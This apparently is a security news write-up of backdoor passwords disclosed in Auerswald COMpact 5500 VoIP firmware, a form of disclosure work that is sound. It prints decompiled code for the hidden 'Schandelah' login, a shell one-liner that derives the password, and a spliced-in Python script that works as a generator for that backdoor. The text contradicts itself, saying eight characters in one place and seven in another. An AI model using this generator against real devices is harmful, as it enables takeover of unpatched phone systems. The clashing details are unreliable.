
Auerswald VoIP firmware identified with multiple backdoors allowing privilege escalation

One of Auerswald's widely used products exposes two backdoor passwords that allow threat actors to escalate privileges.

30-Dec-2021
3 min read

Multiple backdoors were found in devices from Auerswald, a German manufacturer of voice over Internet Protocol (VoIP) telecommunications hardware. A penetration test carried out by RedTeam revealed two backdoor passwords that allow an attacker with access to the management application to take complete administrative control of the device.

The analysis began by downloading the firmware image for the COMpact 5500, version 7.8A, from Auerswald's support website. The firmware was decompiled with the reverse engineering tool Ghidra, and the analysis revealed a default "sub-admin" user.

[Figure: Ghidra search results for the "sub-admin" string]

A certain username was compared to the string "Schandelah". Researchers found this suspicious, since Schandelah is the name of a small village in Northern Germany where Auerswald produces its products.

iVar5 = strcmp((char *)username,"Schandelah");
if (iVar5 == 0) {
  FUN_00287a84(0,&local_94);
  if (local_600 == (undefined4 *)0x0) {
    [...]
  }
  else {
    iVar5 = strcmp((char *)local_600,(char *)&local_94);
    if (iVar5 == 0) {
      [...]
      goto LAB_00015954;
    }
  }
}

For the username Schandelah, the wrapper function FUN_00287a84 fills in the variable local_94. Since local_600 is used as the password elsewhere in the comparison, local_94 must hold the expected password for Schandelah. That password is constructed using the following algorithm:

  1. Retrieve the serial number of the PBX
  2. Retrieve the current date as a string
  3. Calculate the MD5 hash of serial number + “r2d2” + current date (as DD.MM.YYYY)
  4. Return the first eight characters of the calculated hash

The backdoor password is a seven-character prefix of the MD5 hash, as the command below shows; after calculating the password, researchers could log in successfully.

$ echo -n 1234123412r2d230.08.2021 | md5sum | egrep -o '^.{7}'
1432d89
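The derivation above, reimplemented in Python as an added example (not RedTeam's or Auerswald's code). The serial number and date are the constructed values from the command line above; the truncation length is a parameter because the write-up mentions both seven and eight characters, and the sample output uses seven.

```python
import hashlib
from datetime import date

# Fixed string the firmware inserts between serial number and date (from the write-up).
BACKDOOR_SECRET = "r2d2"


def derivation_input(serial: str, day: date) -> str:
    """Step 1-3 preimage: serial number + "r2d2" + date formatted as DD.MM.YYYY."""
    return serial + BACKDOOR_SECRET + day.strftime("%d.%m.%Y")


def schandelah_password(serial: str, day: date, length: int = 7) -> str:
    """Derive the 'Schandelah' backdoor password for a given device and day.

    The password is a prefix of MD5(serial + "r2d2" + DD.MM.YYYY). Everything
    that goes into it (serial number, date) is not secret, which is why a
    hard-coded scheme like this offers no real protection and rotates only
    the visible value, not the underlying weakness.
    """
    preimage = derivation_input(serial, day).encode("ascii")
    return hashlib.md5(preimage).hexdigest()[:length]


if __name__ == "__main__":
    # Constructed sample matching the page's one-liner:
    #   echo -n 1234123412r2d230.08.2021 | md5sum | egrep -o '^.{7}'
    sample_day = date(2021, 8, 30)
    print(derivation_input("1234123412", sample_day))
    print(schandelah_password("1234123412", sample_day))
```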

"Equipped with this password, we then could authenticate successfully. After logging in, the web interface showed a special service page, which allowed, among other functions, to reset the administrator password."

While analyzing CVE-2021-40856, researchers came across CVE-2021-40857, which enables users with limited access to escalate their privileges to sub-admin; at this level an attacker can configure the PBX.

Because exploitation has severe consequences, the backdoor passwords are rated as high severity. Auerswald responded immediately to RedTeam's report and published an advisory in December. The only workaround is to disable, or completely restrict access to, the web-based management interface; users are therefore advised to upgrade to the newest firmware version as soon as possible.